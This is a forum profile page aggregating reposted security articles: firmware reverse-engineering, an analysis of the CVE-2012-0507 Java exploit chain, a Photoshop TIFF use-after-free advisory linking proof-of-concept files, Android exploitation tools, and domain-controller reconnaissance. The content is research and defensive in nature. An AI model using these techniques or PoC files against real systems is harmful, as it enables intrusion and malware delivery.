Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. [h=1]Reverse Engineering Firmware: Linksys WAG120N[/h]By Craig | May 29, 2011 | Embedded Systems, Tutorials The ability to analyze a firmware image and extract data from it is extremely useful. It can allow you to analyze an embedded device for bugs, vulnerabilities, or GPL violations without ever having access to the device. In this tutorial, we’ll be examining the firmware update file for the Linksys WAG120N with the intent of finding and extracting the kernel and file system from the firmware image. The firmware image used is for the WAG120N hardware version 1.0, firmware version 1.00.16 (ETSI) Annex B, released on 08/16/2010 and is currently available for download from the Linksys Web site. The first thing to do with a firmware image is to run the Linux file utility against it to make sure it isn’t a standard archive or compressed file. You don’t want to sit down and start analyzing a firmware image only to realize later that it’s just a ZIP file: OK, it’s nothing known to the file utility. Next, let’s do a hex dump and run strings on it: Taking a look at the strings output, we see references to the U-Boot boot loader and the Linux kernel. This is encouraging, as it suggests that this device does in fact run Linux, and U-Boot is a very common and well documented boot loader: However, taking a quick look at the hexdump doesn’t immediately reveal anything interesting: So let’s run binwalk against the firmware image to see what it can identify for us. There are a lot of false positive matches (these will be addressed in the up-coming 0.3.0 release!), but there are a few results that stand out: Binwalk has found two uImage headers (which is the header format used by U-Boot), each of which is immediately followed by an LZMA compressed file. Binwalk breaks out most of the information contained in these uImage headers, including their descriptions: ‘u-boot image’ and ‘MIPS Linux-2.4.31?. It also shows the reported compression type of ‘lzma’. Since each uImage header is followed by LZMA compressed data, this information appears to be legitimate. The LZMA files can be extracted with dd and then decompressed with the lzma utility. Don’t worry about specifying a size limit when running dd; any trailing garbage will be ignored by lzma during decompression: We are now left with the decompressed files ‘uboot’ and ‘kernel’. Running strings against them confirms that they are in fact the U-Boot and Linux kernel images: We’ve got the kernel and the boot loader images, now all that’s left is finding and extracting the file system. Since binwalk didn’t find any file systems that looked legitimate, we’re going to have to do some digging of our own. Let’s run strings against the extracted Linux kernel and grep the output for any file system references; this might give us a hint as to what file system(s) we should be looking for: Ah! SquashFS is a very common embedded file system. Although binwalk has several SquashFS signatures, it is not uncommon to find variations of the ‘sqsh’ magic string (which indicates the beginning of a SquashFS image), so what we may be looking for here is a non-standard SquashFS signature inside the firmware file. So how do we find an unknown signature inside a 4MB binary file? Different sections inside of firmware images are often aligned to a certain size. This often means that there will have to be some padding between sections, as the size of each section will almost certainly not fall exactly on this alignment boundary. An easy way to find these padded sections is to search for lines in our hexdump output that start with an asterisk (‘*’). When hexdump sees the same bytes repeated many times, it simply replaces those bytes with an asterisk to indicate that the last line was repeated many times. A good place to start looking for a file system inside a firmware image is immediately after these padded sections of data, as the start of the file system will likely need to fall on one of these aligned boundaries. There are a couple interesting sections that contain the string ‘sErCoMm’. This could be something, but given the small size of some of these sections and the fact that they don’t appear to have anything to do with SquashFS, it is unlikely: There are some other sections as well, but again, these are very small, much too small to be a file system: Then we come across this section, which has the string ‘sqlz’ : The standard SquashFS image starts with ‘sqsh’, but we’ve already seen that the firmware developers have used LZMA compression elsewhere in this image. Also, most firmware that uses SquashFS tends to use LZMA compression instead of the standard zlib compression. So this signature could be a modified SquashFS signature that is a concatination of ‘sq’ (SQuashfs) and ‘lz’ (LZma). Let’s extract it with dd and take a look: Of course, ‘sqlz’ is not a standard signature, so the file utility still doesn’t recognize our extracted data. Let’s try editing the ‘sqlz’ string to read ‘sqsh’: Running file against our modified SquashFS image gives us much better results: This definitely looks like a valid SquashFS image! But due to the LZMA compression and the older SquashFS version (2.1), you won’t be able to extract any files from it using the standard SquashFS tools. However, using the unsquashfs-2.1 utility included in Jeremy Collake’s firmware mod kit works perfectly: Now that we know this works, we should go ahead and add this new signature to binwalk so that it will identify the ‘sqlz’ magic string in the future. Adding this new signature is as easy as opening binwalk’s magic file (/etc/binwalk/magic), copy/pasting the ‘sqsh’ signature and changing the ‘sqsh’ to ‘sqlz’: Re-running binwalk against the original firmware image, we see that it now correctly identifies the SquashFS entry: And there you have it. We successfully identified and extracted the boot loader, kernel and file system from this firmware image, plus we have a new SquashFS signature to boot! Sursa: Reverse Engineering Firmware: Linksys WAG120N | /dev/ttyS0
  2. binwalk Firmware Analysis Tool [h=1]About[/h]Binwalk is a tool for searching a given binary image for embedded files and executable code. Specifically, it is designed for identifying files and code embedded inside of firmware images. Binwalk uses the libmagic library, so it is compatible with magic signatures created for the Unix file utility. Binwalk also includes a custom magic signature file which contains improved signatures for files that are commonly found in firmware images such as compressed/archived files, firmware headers, Linux kernels, bootloaders, filesystems, etc. [h=1]News[/h]Version 0.4.2 includes significant speed improvements over previous versions, as well as the addition of some new search options (--grep and --raw-bytes). Version 0.4.0 released. Added support for Linux block devices and building against libmagic rather than the included file utility code. Fixed minor bugs and updated/added signatures. Version 0.3.9 released. Added build options to disable update features (thus disabling the zlib and libcurl requirements). Added long options. Fixed minor bugs and updated/added signatures. Download: http://code.google.com/p/binwalk/downloads/list Sursa: binwalk - Firmware Analysis Tool - Google Project Hosting
  3. Insecure magazine - RSA Conference Detalii inauntru. Download: http://www.net-security.org/dl/insecure/INSECURE-Mag-RSA2012.pdf
  4. [h=3]An interesting case of JRE sandbox breach (CVE-2012-0507)[/h] msft-mmpc msft-mmpc 9,745 Points 2 1 1 Recent Achievements Blogger III Blogger II New Blog Rater View Profile 20 Mar 2012 2:55 AM Recently we received a few samples that exploit the latest patched JRE (Java Runtime Environment) vulnerability. These samples are kind of unusual to see, but they can be used to develop highly reliable exploits. The malicious Java applet is loaded from an obfuscated HTML file. The Java applet contains two Java class files - one Java class file triggers the vulnerability and the other one is a loader class used for loading. The vulnerability triggering class is actually performing deserialization of an object array and uses a vulnerability in the AtomicReferenceArray to disarm the JRE sandbox mechanism. The attacker deliberately crafted serialized object data. This reference array issue is very serious since the exploit is not a memory corruption issue, but a logical flaw in the handling of the array. So the exploit is highly reliable and that might be one of the reasons why the bad guys picked up this vulnerability for their attacks. We determined this vulnerability to be CVE-2012-0507. Figure 1 The vulnerability triggering class The loader class is called from the vulnerability triggering class. This loader class can load additional classes in an escalated privilege context and perform any operations escaping the sandbox mechanism. This loader class creates a new class on the fly and uses it to do malicious jobs with escalated privileges. The 3rd class that is loaded by the loader class downloads a malicious file and decodes it using a simple XOR algorithm. It saves it into a local temporary folder and executes the file using Runtime's exec method. The decoded malicious file is detected as PWS:Win32/Zbot.gen!Y. The following diagram shows the overall process of exploitation. A.class is the vulnerability triggering class, B.class is the loading class and C.class is the 3rd class that downloads, decodes and executes a malicious binary. Figure 2 The overall view of exploitation The following code shows the actual decoding code inside the C.class file. The routine is using a very simple form of XOR decoding. Figure 3 Decoding routine inside C.class file Example SHA1s: fc1ab8bf716a5b3450701ca4b2545888a25398c9 (detected as Exploit:Java/CVE-2012-0507.A) 03e26e735b2f33b3b212bea5b27cbefb2af4ed34 (detected as Exploit:Java/CVE-2012-0507. The good news is that the vendor has provided a patch for this vulnerability since late February. Just make sure you have the latest JRE version installed on your system. Or you can visit this patch update advisory page to see if you require any updates. So please, update your JRE installations and protect yourself. Jeong Wook (Matt) Oh & Chun Feng Sursa: An interesting case of JRE sandbox breach (CVE-2012-0507) - Microsoft Malware Protection Center - Site Home - TechNet Blogs
  5. [h=3]Acquisition and Analysis of Volatile Memory from Android Devices[/h] [h=2]Monday, January 9, 2012[/h] We are happy to announce that our paper on Android memory forensics has just been published in the Journal of Digital Investigations! This paper covers a number of topics that we believe will be of interest to both practitioners and researchers in the memory forensics field. The two main contributions of the paper are: A kernel module that is able to acquire a complete memory capture from Android devices as well as other Linux computers. This module is also unique in that it operates solely within the kernel and does not require userland interaction. This preserves memory much more effectively than other kernel modules, and a complete comparison of the efficiency is given in the paper. The kernel module can also acquire memory over the network, which prevents the investigator from having to save to the phone’s internal storage or SD card. Additions to the Volatility memory analysis framework that allow it to analyze Android kernel memory. This allows all of the Linux analysis plugins to be used against Android memory captures. There is also discussion on the difficulty of performing generic memory analysis of Android devices as well as the differences of the ARM versus Intel architecture, where a majority of previous memory forensics research has been performed. If you are interested in this research and are going to be at Shmoocon, Joe Sylve (@jtsylve) will be there presenting the memory acquisition module as well as the Volatility capabilities. You can also leave comments on the blog or find us on Twitter. Download: http://digitalforensicssolutions.com/papers/android-memory-analysis-DI.pdf Sursa: Digital Forensics Solutions: New Paper - Acquisition and Analysis of Volatile Memory from Android Devices
  6. Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities A free framework for bug hunters to find vulnerabilities, write proof-of-concept exploits and play in Android. Use dynamic analysis on Android applications and devices for quicker security assessments. Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices. The easy extensions interface allows users to write custom modules and exploits for Mercury Replace custom applications and scripts that perform single tasks with a framework that provides many tools. Mercury allows you to: Interact with the 4 IPC endpoints - activities, broadcast receivers, content providers and services Use a proper shell that allows you to play with the underlying Linux OS from the point of view of an unprivileged application (you will be amazed at how much you can still see) Find information on installed packages with optional search filters to allow for better control Built-in commands that can check application attack vectors on installed applications Tools to upload and download files between the Android device and computer without using ADB (this means it can be done over the internet as well!) Create new modules to exploit your latest finding on Android, and playing with those that others have found. This demonstration shows how you can find and exploit SQL injection in Android applications using Mercury. Download: http://labs.mwrinfosecurity.com/assets/254/mercury-v1.0.zip Guide: http://www.reddit.com/tb/r3atb Sursa: Mercury v1.0 - Framework for bug hunters to find Android vulnerabilities | The Hacker News (THN)
  7. Info: http://www.securitybydefault.com/2012/03/exploit-de-joomla-paso-paso.html
  8. [h=1]VIDEO: How to solve the RSA 2012 #sophospuzzle[/h] by Paul Ducklin on March 20, 2012 | Comments (2) Filed Under: Featured, Video Here is a showing you how to solve the RSA 2012 crypto puzzle which featured on our conference T-shirts at this year's RSA hootenanny in San Francisco. We've awarded one NERF gun prize to the first finisher, @trapflag, and a second to Robert Miller, who was randomly chosen (using a hardware random number generator made from coins and playing cards) from the 19 other successful solvers. Winners, please email me to let me know where to send the prizes. For those of you who didn't finish, here's how to do it: (Enjoy this video? Check out more on the SophosLabs YouTube channel.) The second stage of this puzzle involved writing code to perform a cryptographic brute force attack; although there were numerous optimisations you could apply, there were no short cuts. That means that you really had to back yourself that your code was correctly written - so well done to all who took part, and especially to the 20 of you who cracked the puzzle in time. If you enjoy this sort of puzzle, watch this space: we intend to run them regularly. You might also enjoy watching or trying previous #sophospuzzles! Sursa: VIDEO: How to solve the RSA 2012 #sophospuzzle | Naked Security
  9. [h=3]SSL optimization and security talk[/h] Filed under: Crypto,Network,Protocols,Security — Nate Lawson @ 6:12 am I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap Start has been withdrawn, but there are some interesting design tradeoffs in these proposals that merit attention. False Start provides a minor improvement over stock SSL, which takes two round trips in the initial handshake before application data can be sent. It saves one round trip on the initial handshake at the cost of sending data before checking for someone modifying the server’s handshake messages. It doesn’t provide any benefit on subsequent connections since the stock SSL resume protocol only takes one round trip also. The False Start designers were aware of this risk, so they suggested the client whitelist ciphersuites for use with False Start. The assumption is that an attacker could get the client to provide ciphertext but wouldn’t be able to decrypt it if the encryption was secure. This is true most of the time, but is not sufficient. The BEAST attack is a good example where ciphersuite whitelists are not enough. If a client used False Start as described in the standard, it couldn’t detect an attacker spoofing the server version in a downgrade attack. Thus, even if both the client and server supported TLS 1.1, which is secure against BEAST, False Start would have made the client insecure. Stock SSL would detect the version downgrade attack before sending any data and thus be safe. The False Start standard (or at least implementations) could be modified to only allow False Start if the TLS version is 1.1 or higher. But this wouldn’t prevent downgrade attacks against TLS 1.1 or newer versions. You can’t both be proactively secure against the next protocol attack and use False Start. This may be a reasonable tradeoff, but it does make me a bit uncomfortable. Snap Start removes both round trips for subsequent connections to the same server. This is one better than stock SSL session resumption. Additionally, it allows rekeying whereas session resumption uses the same shared key. The security cost is that Snap Start removes the server’s random contribution. SSL is designed to fail safe. For example, neither party solely determines the nonce. Instead, the nonce is derived from both client and server randomness. This way, poor PRNG seeding by one of the participants doesn’t affect the final output. Snap Start lets the client determine the entire nonce, and the server is expected to check it against a cache to prevent replay. There are measures to limit the size of the cache, but a cache can’t tell you how good the entropy is. Therefore, the nonce may be unique but still predictable. Is this a problem? Probably not, but I haven’t analyzed how a predictable nonce affects all the various operating modes of SSL (e.g., ECDH, client cert auth, SRP auth, etc.) The key insight between both of these proposed changes to SSL is that latency is an important issue to SSL adoption, even with session resumption being built in from the beginning. Also, Google is willing to shift the responsibility for SSL security towards the client in order to save on latency. This makes sense when you own a client and your security deployment model is to ship frequent client updates. It’s less clear that this tradeoff is worth it for SSL applications besides HTTP or other security models. I appreciate the work people like Adam have been doing to improve SSL performance and security. Obviously, unprotected HTTP is worse than some reductions in SSL security. However, careful study is needed for the many users of these kinds of protocol changes before their full impact is known. I remain cautious about adopting them. Sursa: SSL optimization and security talk
  10. [h=3]Configuring Firefox For Web App Pen Testing[/h][h=2]15 March 2012[/h] You know the routine: you get a gig doing a web app pen test. You break out Burp (or whatever lesser proxy you prefer), and get ready to ruin some developer's day. And then, just as you get ready to load the target URL and start, this happens: It's annoying. Your logs are polluted, and if you have to turn them over to the client, the extra noise strips some of the professionalism from your image (as a sidenote: Burp's "only save in-scope items" feature helps quite a lot with this). Here then, is a quick guide on how to tweak Firefox so that it doesn't spew stupid crap in your web app pen test log files. I may come back and explain the "why" behind some of these later, but for now, just the "how" will have to do. (Note: some of these settings reduce the security of the browser. My presumption here is that Firefox will only be used for testing, not for general purpose browsing. The settings below reflect that.) 1) Open about:config 2) Disable Safe Browsing 3) Disable Pipelining 4) Disable Pre-fetching 5) Remove all bookmarks 6) Set homepage to about:blank for startup 7) Make sure history is enabled, but disable search suggestions 8) Disable checking for updates 9) Just say no to helping developers 10) Disable updates for sync That's it. Now you can go forth, and break all the things, knowing that your log files will be nice and tidy afterwards. Posted by Jason Ross at 14:04 Sursa: cruft: Configuring Firefox For Web App Pen Testing
  11. [h=3]BackTrack tool review: goofile[/h] [h=2]08 March 2012[/h] Note: This is part of a series on BackTrack 5 tool reviews. It is not meant to be an exhaustive analysis of any tool, just a demonstration of the tool using real-world targets. Goofile is a simple script that searches Google for specific file types from specific domains. This is useful if you're looking for specific types of files because it parses the results for you. root@bt:/pentest/enumeration/google/goofile# ./goofile.py ------------------------------------- |Goofile v1.5 | |Coded by Thomas (G13) Richards | |www.g13net.com | |code.google.com/p/goofile | ------------------------------------- Goofile 1.5 usage: goofile options -d: domain to search -f: filetype (ex. pdf) example:./goofile.py -d test.com -f txt Using un.org (one of our common examples), we can quickly put together a list of PDF files from the domain: root@bt:/pentest/enumeration/google/goofile# ./goofile.py -d un.org -f pdf ------------------------------------- |Goofile v1.5 | |Coded by Thomas (G13) Richards | |www.g13net.com | |code.google.com/p/goofile | ------------------------------------- Searching in un.org for pdf ======================================== Files found: ==================== www.un.org/sport2005/a_year/questions.pdf www.un.org/un60/60ways_short.pdf www.un.org/millenniumgoals/MDG2011_Asia_EN.pdf www.un.org/millenniumgoals/MDG2011_na_EN.pdf www.un.org/largerfreedom/executivesummary.pdf www.un.org/summit2005/events_schedule.pdf www.un.org/secureworld/report3.pdf www.un.org/millenniumgoals/MDG2011_PRa_EN.pdf www.un.org/WCAR/durban.pdf www.un.org/summit2005/calendar.pdf www.un.org/secureworld/report.pdf www.un.org/secureworld/report2.pdf www.un.org/millenniumgoals/MDG2011_SSA_EN.pdf www.un.org/WCAR/aconf189_12.pdf www.un.org/peace/bnote010101.pdf www.un.org/events/res_1325e.pdf www.un.org/secureworld/brochure.pdf www.un.org/millenniumgoals/MDG2012_MediaContact_EN.pdf www.un.org/peace/ppbm.pdf www.un.org/millenniumgoals/MDG2011_cca_EN.pdf www.un.org/millenniumgoals/MDG2011_wa_EN.pdf www.un.org/smallislands2005/parallel.pdf www.un.org/esa/population/publications/adoption2010/child_adoption.pdf www.un.org/en/hq/dm/pdfs/RFS_Accountability.pdf www.un.org/esa/population/publications/reprobehavior/partrepro.pdf www.un.org/depts/los/general_assembly/study/study_files/unep_basel_convention.pdf www.un.org/depts/los/general_assembly/.../unep_basel_convention.pdf www.un.org/depts/los/general_assembly/study/study_files/germany_e.pdf www.un.org/depts/los/general_assembly/study/study.../germany_e.pdf www.un.org/events/smallarms2005/bms_faq_e.pdf www.un.org/democracyfund/Docs/UU13.pdf www.un.org/partnerships/Docs/Newsletter.pdf www.un.org/millenniumgoals/pdf/mg1_hunger_badiane.pdf www.un.org/russian/summit2005/outcome.pdf www.un.org/democracyfund/Docs/UNDEF_brochure.pdf www.un.org/millenniumgoals/pdf/rockefeller_march_25_prep.pdf www.un.org/disabilities/documents/user_survivor_initiatives.pdf www.un.org/millenniumgoals/pdf/PR_Africa_MDG09_EN.pdf www.un.org/partnerships/Docs/Fellows_2010_bios.pdf www.un.org/partnerships/Docs/GSCP_Guide.pdf www.un.org/millenniumgoals/pdf/josette_sheeran_8mar2010.pdf www.un.org/durbanreview2009/pdf/summary_report.pdf www.un.org/millenniumgoals/pdf/MDG_FS_7_EN.pdf www.un.org/millenniumgoals/pdf/sha_zukang_8mar2010.pdf www.un.org/millenniumgoals/pdf/mdg_snapshot_16mar.pdf www.un.org/webcast/pdfs/21century59.pdf www.un.org/esa/peacebuilding/mapping.pdf www.un.org/partnerships/Docs/MSD_Partnerships.pdf www.un.org/chinese/millenniumgoals/MDGProgressChart2006.pdf www.un.org/partnerships/Docs/Organisation_UNOP.pdf www.un.org/millenniumgoals/pdf/MDG2010_PR_EN.pdf www.un.org/sg/ethicalstandards/PublicDisclosure.pdf www.un.org/durbanreview2009/pdf/E_Bulletin_Issue1_10_2008.pdf www.un.org/millenniumgoals/pdf/Press_release_MDG_Gap_2009.pdf www.un.org/democracyfund/Docs/UU09.pdf www.un.org/sg/files/staff_fd_form.pdf www.un.org/WCAR/journal/j31aug.pdf www.un.org/law/books/IntlLawAsLanguageForIntlRelations.pdf www.un.org/democracyfund/Docs/Worth_Reading_Laos_Newsletter_Vol1.pdf www.un.org/democracyfund/.../Worth_Reading_Laos_Newsletter_Vol1.pdf www.un.org/partnerships/Docs/Philanthropy_UK_profile_Ted_Turner.pdf www.un.org/millenniumgoals/pdf/EPG_Report_031511_B_ENGLISH_w.pdf www.un.org/millenniumgoals/.../EPG_Report_031511_B_ENGLISH_w.pdf www.un.org/millenniumgoals/sgreport2004.pdf www.un.org/webcast/pdfs/21century60Azerbaijan.pdf www.un.org/millenniumgoals/pdf/MDG_H_LatinAm.pdf www.un.org/law/technical/FinalReport.pdf www.un.org/millennium/declaration/ares552e.pdf www.un.org/regionalcommissions/CSW2010/escwa.pdf panel.pdf www.un.org/waterforlifedecade/pdf/05_2010_reader_financing_eng.pdf www.un.org/millenniumgoals/pdf/WaterAid_sanitation_and_water.pdf www.un.org/disabilities/documents/review_of_disability_and_the_mdgs.pdf endviolence.un.org/pdf/unite_framework_en.pdf www.un.org/millenniumgoals/pdf/MDG_PR_EN.pdf www.un.org/law/trustfund/eterms.pdf www.un.org/regionalcommissions/CSW2010/eclac.pdf www.un.org/disabilities/documents/csw56_ortoleva.pdf www.un.org/millenniumgoals/pdf/mdg_pressrel_sept2010.pdf www.un.org/millenniumgoals/pdf/MDG_FS_8_EN.pdf www.un.org/waterforlifedecade/pdf/05_2011_human_right_to_water_reader_eng.pdf www.un.org/.../pdf/05_2011_human_right_to_water_reader_eng.pdf www.un.org/webcast/pdfs/21century62.pdf www.un.org/millenniumgoals/sgreport2002.pdf www.un.org/democracyfund/Docs/UU_11.pdf www.un.org/webcast/pdfs/21century45.pdf www.un.org/waterforlifedecade/pdf/hrw_glossary_eng.pdf www.un.org/law/books/CollectionOfEssaysByLegalAdvisers.pdf www.un.org/millenniumgoals/pdf/PR_NorthAfrica_MDG09_EN.pdf www.un.org/millenniumgoals/SG_MDGREport2011_ecosoc-7july2011.pdf www.un.org/durbanreview2009/pdf/InfoNote_10_Indigenous_Peoples_En.pdf www.un.org/ga/civilsocietyhearings/infonote.pdf www.un.org/democracyfund/Docs/AfricanCharterDemocracy.pdf www.un.org/democracyfund/Docs/Third_Round.pdf www.un.org/media/main/roadmap122002.pdf www.un.org/millenniumgoals/pdf/MDG_G_CIS.pdf www.un.org/docs/sc/Forecast.pdf www.un.org/WCAR/journal/journalE.pdf www.un.org/millenniumgoals/2011_Gap_Report/2011MDGGAP_PR_EN.pdf www.un.org/millenniumgoals/2011_Gap.../2011MDGGAP_PR_EN.pdf www.un.org/millenniumgoals/pdf/MDG_FS_2_EN.pdf www.un.org/durbanreview2009/pdf/InfoNote_09_Peoples_of_African_Descent_En.pdf www.un.org/.../pdf/InfoNote_09_Peoples_of_African_Descent_En.pdf www.un.org/millenniumgoals/pdf/MDG_FS_4_EN.pdf www.un.org/partnerships/Docs/BJ_Speech.pdf www.un.org/waterforlifedecade/pdf/water_for_life_award_eng.pdf www.un.org/millenniumgoals/pdf/MDG_C_Asia.pdf www.un.org/webcast/pdfs/unia1326.pdf ==================== Sursa: http://theprez98.blogspot.com/2012/03/backtrack-tool-review-goofile.html
  12. [h=1]The big leak: Microsoft's epic security fail[/h]March 19, 2012 [h=2]It appears the source of a recent zero-day exploit was Microsoft's program to prevent zero-day exploits. Why is Cringely not surprised?[/h] By Robert X. Cringely | InfoWorld Some words just seem to go together: "bread" and "butter"; "trial" and "error"; "Microsoft" and "security breach." The MS12-020 Remote Desktop Protocol vulnerability revealed last week shows once again that when it comes to data security, Microsoft is its own worst enemy and any "secure" system can be compromised. As Computerworld's Gregg Keizer reports, the proof-of-concept RDP exploit was developed by Italian security wonk Luigi Auriemma last May. He passed it on to HP's bug bounty program, aka the Zero Day Initiative, in August. HP's ZDI passed Auriemma's code to Microsoft, which shared it with its 79 antivirus security partners in its Microsoft Active Protections Program (MAPP). That list includes the biggest names in computer security, as well as some lesser-known European and Asian firms. Somewhere along the line that code escaped from the lab and is now in the wild, infecting unsuspecting citizens and creating an army of flesh-eating zombies. [ Cringely calls attention to a different sort of attack on your system, mounted by the piracy bullies. | For a humorous take on the tech industry's shenanigans, subscribe to Robert X. Cringely's Notes from the Underground newsletter. | Get the latest insight on the tech news that matters from InfoWorld's Tech Watch blog. ] (Sorry, I was confusing it with "The Walking Dead." My bad.) Last week Auriemma found the exploit code he'd created on a Chinese website, along with telltale signs that proved it was the same code he had written and that this code had been passed on to Microsoft before being leaked. Now we have three key suspects: Mr. Ballmer in the library with the candlestick, Ms. Whitman in the conservatory with the rope, or Premier Wen Jiabao in the lotus garden with the rainbow sword. Microsoft is pointing the finger at its MAPP partners, and it's probably right, given how easily Symantec was pwned by ********* for its source code last year. I'm not saying Symantec is the leaker (though that's the first place I'd look, simply because of the hack) or that ********* is the leakee. If it were the Anons, you'd think they'd be crowing their heads off about that right about now. Still, you wouldn't have to be a hacking mastermind to pull this off. A little social engineering to gain access to an email list, a quick search of the inbox for a message containing the log-on and password to the MAPP program -- boom, you're in. Then post the code on a hacker-friendly forum and wait for the walls to come tumbling down. The effect of the RDP vulnerability, if you're unlucky enough to encounter it: the blue screen of death. In other words, no perceptible difference from Windows' normal operation. And Microsoft has already released a patch. No harm, no foul, right? Not exactly. Unless this leak is found and patched immediately, the system created to combat zero-day exploits could soon become the leading source for zero-day exploits. The RDP attack can't be the only bad code these guys were playing with, and the next worm-ready malware may not be so benign or so obvious. Even if this leaks begins and ends with the RDP exploit, this system has been compromised and can no longer be trusted. Without an early-warning system for these kinds of exploits, we all just got a whole lot less secure. As Luigi wrote on his personal site: f the author of the leak is one of the MAPP partners... it's the epic fail of the whole system, what do you expect if you give the [proof of concept] to your "super trusted" partners? Epic fail. Another two words that go together -- like "Microsoft" and "insecurity." Is this leak as serious as it sounds? Did I leave any metaphor unturned? Post your thoughts below or email me: cringe@infoworld.com. This article, "The big leak: Microsoft's epic security fail," was originally published at InfoWorld.com. Follow the crazy twists and turns of the tech industry with Robert X. Cringely's Notes from the Field blog, and subscribe to Cringely's Notes from the Underground newsletter. Sursa: The big leak: Microsoft's epic security fail | Cringely - InfoWorld
  13. [h=1]Compiling Nmap for Android[/h] Compile Nmap for Android This tutorial will show you how to compile the latest version of Nmap for your Android device starting with a standard Ubuntu install. I will offer instructions on how to obtain two versions of compiler that I’ve had success compiling software for Android. I will show the Android NDK and the free Lite ARM compiler from Mentor (formally Code Sorcery). Hopefully you can take this instruction to try and compile other tools for Android. The build environment and instructions come from an auditor with strong technical skills but somebody who is not a programmer or developer so hopefully my view point can help other individuals who are also not developers. I’ve built cross-compile environments for Openwrt, Nokia Maemo, Familiar Linux (iPaq) in the past but always from piecing together instructions from multiple Google queues and forum searches. I’m creating this document so it will be helpful for someone somebody elses Google search. After the Ubuntu installation here are ALL the steps you can/should take to compile Nmap for Android. I like vim as my command-line editor. You can use which ever editor you prefer. Here is a quick rundown of what is done. Everything (almost) is done from a terminal window. I update all Ubuntu software and install all files and tools to compile software on Ubuntu I download the software required to compile for Android Setup the environment to compile for Android I create a source folder in the home directory for downloading and compiling the software. Download the software, patch, configure, and compile. Install Android SDK Platform Tools to copy files to your phone Copy files to the phone and set PATH environment variable. (read more) (download PDF) Download: http://www.jedge.com/docs/Compile%20Nmap%20for%20Android.pdf Sursa: Compiling Nmap for Android
  14. [h=1]Adobe Photoshop 12.1 Tiff Parsing Use-After-Free[/h] ##################################################################################### Application: Adobe Photoshop 12.1 Tiff Parsing Use-After-Free Platforms: Windows {PRL}: 2012-07 Author: Francis Provencher (Protek Research Lab's) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated. Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS. Thus, Adobe Photoshop CS5 is the 12th major release of Adobe Photoshop. The CS rebranding also resulted in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price. Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features.[6] Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard, which includes the Adobe Photoshop edition. Alongside Photoshop and Photoshop Extended, Adobe also publishes Photoshop Elements and Photoshop Lightroom, collectively called "The Adobe Photoshop Family". In 2008, Adobe released Adobe Photoshop Express, a free web-based image editing tool to edit photos directly on blogs and social networking sites; in 2011 a version was released for the Android operating system and the iOS operating system.[7][8] Adobe only supports Windows and Macintosh versions of Photoshop, but using Wine, Photoshop CS5 can run well on Linux (http://en.wikipedia.org/wiki/Adobe_Photoshop) ##################################################################################### ============================ 2) Report Timeline ============================ 2011-09-20 Vulnerability reported to Adobe 2012-03-20 Publication of this advisory (180 days after reporting to the vendor) ##################################################################################### ============================ 3) Technical details ============================ The vulnerability is caused due to an error when processing Tiff file format image, which can be exploited to cause a use-after-free by e.g. tricking a user into opening a specially crafted file. ##################################################################################### =========== 4) POC =========== http://www.protekresearchlab.com/exploits/PRL-2012-07.tif http://www.exploit-db.com/sploits/18633.tif Sursa: Adobe Photoshop 12.1 Tiff Parsing Use-After-Free
  15. [h=2]Locating Domain Controllers[/h] So I just setup a mini enterprise environment with a domain controller (tip: win2k8r2 can be used free for 180 days)and a client. I decided to run wireshark while I added the client to the new domain, which resulted in the following screenshot: Now that looks rather interesting when you want to locate domain controllers doesn’t it? Let’s give it a go with nslookup [INDENT]C:\>nslookup -type=SRV _ldap._tcp.dc._msdcs.pen.test Server: UnKnown Address: 192.168.164.128 _ldap._tcp.dc._msdcs.pen.test SRV service location: priority = 0 weight = 100 port = 389 svr hostname = win-62u3ql0g1ia.pen.test win-62u3ql0g1ia.pen.test internet address = 192.168.164.128 win-62u3ql0g1ia.pen.test internet address = 192.168.126.133 [/INDENT] Now isn’t that neat? It’s like a quick and easy way to find the available domain controllers in a network, if you know the domain name. Additionally it seems that the client communicates with the domain controller using CLDAP. I didn’t find a suitable Linux client, but in the links below you’ll find a perl script capable of performing the so called “LDAP Ping“, the other option is of course using a windows client. The output of the script is similar to the one shown in Wireshark which looks as follow: Now I can’t be the only one doing this, so I googled around a bit and found some nice additional material worth the read, they are summed up below: http://support.microsoft.com/kb/24781 ftp://pserver.samba.org/pub/unpacked/samba_3_waf/examples/misc/cldap.pl http://msdn.microsoft.com/en-us/library/cc223799(v=prot.10).aspx MS-CLDAP - The Wireshark Wiki SRV Resource Records Sursa: Locating Domain Controllers
  16. Portable Executable File Format – A Reverse Engineer View Goppit January 2006 Abstract This tutorial aims to collate information from a variety of sources and present it in a way which is accessible to beginners. Although detailed in parts, it is oriented towards reverse code engineering and superfluous information has been omitted. Download: http://ivanlef0u.fr/repo/windoz/pe/CBM_1_2_2006_Goppit_PE_Format_Reverse_Engineer_View.pdf
  17. Signing Me onto Your Accounts through Facebook and Google: a Traffic-Guided Security Study of Commercially Deployed Single-Sign-On Web Services Rui Wang Indiana University Bloomington Bloomington, IN, USA wang63 @indiana.edu Shuo Chen Microsoft Research Redmond, WA, USA shuochen @microsoft.com XiaoFeng Wang Indiana University Bloomington Bloomington, IN, USA xw7 @indiana.edu Abstract— With the boom of software-as-a-service and social networking, web-based single sign-on (SSO) schemes are being deployed by more and more commercial websites to safeguard many web resources. Despite prior research in formal verification, little has been done to analyze the security quality of SSO schemes that are commercially deployed in the real world. Such an analysis faces unique technical challenges, including lack of access to well-documented protocols and code, and the complexity brought in by the rich browser elements (script, Flash, etc.). In this paper, we report the first “field study” on popular web SSO systems. In every studied case, we focused on the actual web traffic going through the browser, and used an algorithm to recover important semantic information and identify potential exploit opportunities. Such opportunities guided us to the discoveries of real flaws. In this study, we discovered 8 serious logic flaws in high-profile ID providers and relying party websites, such as OpenID (including Google ID and PayPal Access), Facebook, JanRain, Freelancer, FarmVille, 